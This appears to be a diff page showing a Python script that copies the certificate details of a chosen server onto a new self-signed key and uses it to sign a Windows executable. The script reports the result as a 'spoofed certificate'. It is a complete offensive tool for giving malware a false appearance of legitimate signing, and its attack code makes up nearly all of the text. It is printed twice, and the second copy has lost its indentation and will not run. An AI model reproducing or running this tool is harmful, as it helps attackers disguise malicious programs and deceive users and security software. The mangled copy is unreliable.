sharpicx · August 4, 2024 09:27
diff --git a/signing.py b/signing.py
 import random
 import sys

 from OpenSSL import crypto
 from pathlib import Path
 from ssl import get_server_certificate
 from subprocess import call, PIPE
 from os import system
 from random import randrange, randint, uniform, shuffle, SystemRandom
 from string import ascii_letters

 def spoofer(host, port, filename, out):
    TIMESTAMP_URL = "http://sha256timestamp.ws.symantec.com/sha256/timestamp"
    try:
        ogcert = get_server_certificate((host, int(port)))
        x509 = crypto.load_certificate(crypto.FILETYPE_PEM, ogcert)
        certDir = Path('certs')
        certDir.mkdir(exist_ok=True)

        cncrt = certDir / (host + ".crt")
        cnkey = certDir / (host + ".key")
        PFXFILE = certDir / (host + ".pfx")

        # Creating Keygen
        k = crypto.PKey()
        k.generate_key(crypto.TYPE_RSA, ((x509.get_pubkey()).bits()))
        cert = crypto.X509()

        # Setting Cert details from loaded from the original Certificate
        cert.set_version(x509.get_version())
        cert.set_serial_number(x509.get_serial_number())
        cert.set_subject(x509.get_subject())
        cert.set_issuer(x509.get_issuer())
        cert.set_notBefore(x509.get_notBefore())
        cert.set_notAfter(x509.get_notAfter())
        cert.set_pubkey(k)
        cert.sign(k, 'sha256')
        cncrt.write_bytes(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
        cnkey.write_bytes(crypto.dump_privatekey(crypto.FILETYPE_PEM, k))
        try:
            pfx = crypto.PKCS12()
        except AttributeError:
            pfx = crypto.PKCS12()
        pfx.set_privatekey(k)
        pfx.set_certificate(cert)
        pfxdata = pfx.export()
        PFXFILE.write_bytes(pfxdata)
        args = ("osslsigncode", "sign", "-pkcs12", PFXFILE, "-n", varname_creator(), "-i", TIMESTAMP_URL, "-in", filename, "-out", out)
        call(args, stdout=PIPE)
        certificate = host + ":" + port
        pe_signed(certificate)

    except Exception as ex:
        bad_certificate(ex)

 def bad_certificate(ex):
    print(f"[!] There is an error in the specified certificate. The executable file has not been signed.\n{ex}\n")

 def varname_creator():
    varname = ''.join(SystemRandom().choice(ascii_letters) for _ in range(randint(8, 12)))
    return varname

 def pe_signed(certificate):
    print(f"[+] PE file signed with spoofed certificate from {certificate}")

 if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"[!] usage: {sys.argv[0]} <host> <port> <filename> <output>")
        exit(1)
        
    spoofer(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])
	import random
	import sys

	from OpenSSL import crypto
	from pathlib import Path
	from ssl import get_server_certificate
	from subprocess import call, PIPE
	from os import system
	from random import randrange, randint, uniform, shuffle, SystemRandom
	from string import ascii_letters

	def spoofer(host, port, filename, out):
	TIMESTAMP_URL = "http://sha256timestamp.ws.symantec.com/sha256/timestamp"
	try:
	ogcert = get_server_certificate((host, int(port)))
	x509 = crypto.load_certificate(crypto.FILETYPE_PEM, ogcert)
	certDir = Path('certs')
	certDir.mkdir(exist_ok=True)

	cncrt = certDir / (host + ".crt")
	cnkey = certDir / (host + ".key")
	PFXFILE = certDir / (host + ".pfx")

	# Creating Keygen
	k = crypto.PKey()
	k.generate_key(crypto.TYPE_RSA, ((x509.get_pubkey()).bits()))
	cert = crypto.X509()

	# Setting Cert details from loaded from the original Certificate
	cert.set_version(x509.get_version())
	cert.set_serial_number(x509.get_serial_number())
	cert.set_subject(x509.get_subject())
	cert.set_issuer(x509.get_issuer())
	cert.set_notBefore(x509.get_notBefore())
	cert.set_notAfter(x509.get_notAfter())
	cert.set_pubkey(k)
	cert.sign(k, 'sha256')
	cncrt.write_bytes(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
	cnkey.write_bytes(crypto.dump_privatekey(crypto.FILETYPE_PEM, k))
	try:
	pfx = crypto.PKCS12()
	except AttributeError:
	pfx = crypto.PKCS12()
	pfx.set_privatekey(k)
	pfx.set_certificate(cert)
	pfxdata = pfx.export()
	PFXFILE.write_bytes(pfxdata)
	args = ("osslsigncode", "sign", "-pkcs12", PFXFILE, "-n", varname_creator(), "-i", TIMESTAMP_URL, "-in", filename, "-out", out)
	call(args, stdout=PIPE)
	certificate = host + ":" + port
	pe_signed(certificate)

	except Exception as ex:
	bad_certificate(ex)

	def bad_certificate(ex):
	print(f"[!] There is an error in the specified certificate. The executable file has not been signed.\n{ex}\n")

	def varname_creator():
	varname = ''.join(SystemRandom().choice(ascii_letters) for _ in range(randint(8, 12)))
	return varname

	def pe_signed(certificate):
	print(f"[+] PE file signed with spoofed certificate from {certificate}")

	if __name__ == "__main__":
	if len(sys.argv) < 4:
	print(f"[!] usage: {sys.argv[0]} <host> <port> <filename> <output>")
	exit(1)

	spoofer(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])